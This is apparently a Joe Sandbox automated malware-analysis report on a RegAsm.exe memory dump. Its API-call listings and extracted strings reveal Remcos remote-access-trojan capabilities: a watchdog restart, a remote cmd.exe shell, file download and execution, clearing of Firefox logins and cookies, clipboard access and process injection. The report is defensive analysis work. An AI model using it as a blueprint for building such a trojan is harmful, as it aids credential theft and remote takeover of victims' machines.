                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CodeInfoPageValid
                            • String ID:
                            • API String ID: 546120528-0
                            APIs
                              • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                              • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                              • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                              • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                              • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                              • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                              • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                            • _free.LIBCMT ref: 0044F050
                            • _free.LIBCMT ref: 0044F086
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorLast_abort
                            • String ID:
                            • API String ID: 2991157371-0
                            APIs
                            • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc__crt_fast_encode_pointer
                            • String ID:
                            • API String ID: 2279764990-0
                            APIs
                            • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                              • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEventStartupsocket
                            • String ID:
                            • API String ID: 1953588214-0
                            APIs
                            • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                            • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                             • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                            • String ID:
                            • API String ID: 3750050125-0
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$ForegroundText
                            • String ID:
                            • API String ID: 29597999-0
                            APIs
                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                            • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                              • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                              • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                              • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                              • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                              • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                              • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                              • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                              • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                            • String ID:
                            • API String ID: 1170566393-0
                            APIs
                              • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                             • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                             • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                            • String ID:
                            • API String ID: 806969131-0
                            APIs
                              • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                            • String ID:
                            • API String ID: 806969131-0
                            APIs
                              • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                              • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                              • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                              • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                              • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                              • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                              • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                              • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                              • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                              • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                            • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                            • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                            • String ID:
                            • API String ID: 2948481953-0
                            APIs
                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: __crt_fast_encode_pointer
                            • String ID:
                            • API String ID: 3768137683-0
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: __alldvrm
                            • String ID:
                            • API String ID: 65215352-0
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            APIs
                            • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            APIs
                            • std::_Deallocate.LIBCONCRT ref: 00402E2B
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Deallocatestd::_
                            • String ID:
                            • API String ID: 1323251999-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: send
                            • String ID:
                            • API String ID: 2809346765-0
                            APIs
                            • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 00407CF4
                            • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                            • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                              • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C37D
                              • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C3AD
                              • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C402
                              • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C463
                              • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.S,004752F0,00000001), ref: 0041C46A
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                            • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                            • DeleteFileA.KERNEL32(?), ref: 0040868D
                              • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                              • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                              • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                              • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                            • Sleep.KERNEL32(000007D0), ref: 00408733
                            • StrToIntA.SHLWAPI(00000000), ref: 00408775
                              • Part of subcall function 0041CA73: SystemParametersInfoW.USER32 ref: 0041CB68
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                            • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                            • API String ID: 1067849700-181434739
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 004056E6
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • __Init_thread_footer.LIBCMT ref: 00405723
                            • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                            • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                              • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                            • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                            • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                            • CloseHandle.KERNEL32 ref: 00405A23
                            • CloseHandle.KERNEL32 ref: 00405A2B
                            • CloseHandle.KERNEL32 ref: 00405A3D
                            • CloseHandle.KERNEL32 ref: 00405A45
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                            • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                            • API String ID: 2994406822-18413064
                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00412141
                              • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                              • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                              • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                            • OpenMutexA.KERNEL32 ref: 00412181
                            • CloseHandle.KERNEL32(00000000), ref: 00412190
                            • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                            • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$`.S$fsutil.exe$rmclient.exe$svchost.exe
                            • API String ID: 3018269243-4205388774
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                            • FindClose.KERNEL32(00000000), ref: 0040BC04
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                            • FindClose.KERNEL32(00000000), ref: 0040BD4D
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                            • API String ID: 1164774033-3681987949
                            APIs
                            • OpenClipboard.USER32 ref: 004168FD
                            • EmptyClipboard.USER32 ref: 0041690B
                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                            • GlobalLock.KERNEL32 ref: 00416934
                            • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                            • SetClipboardData.USER32 ref: 00416973
                            • CloseClipboard.USER32 ref: 00416990
                            • OpenClipboard.USER32 ref: 00416997
                            • GetClipboardData.USER32 ref: 004169A7
                            • GlobalLock.KERNEL32 ref: 004169B0
                            • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                            • CloseClipboard.USER32 ref: 004169BF
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                            • String ID: !D@
                            • API String ID: 3520204547-604454484
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                            • FindClose.KERNEL32(00000000), ref: 0040BE04
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                            • FindClose.KERNEL32(00000000), ref: 0040BEEA
                            • FindClose.KERNEL32(00000000), ref: 0040BF0B
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$Close$File$FirstNext
                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                            • API String ID: 3527384056-432212279
                            • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                            • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                            • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                            • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                            • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                              • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                            • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$`.S$ieinstal.exe$ielowutil.exe
                            • API String ID: 3756808967-2460292970
                            • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                            • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                            • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                            • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                            APIs
                            • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                            • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                            • CloseHandle.KERNEL32(00000000), ref: 0041349A
                            • CloseHandle.KERNEL32(?), ref: 004134A0
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                            • String ID:
                            • API String ID: 297527592-0
                            • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                            • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
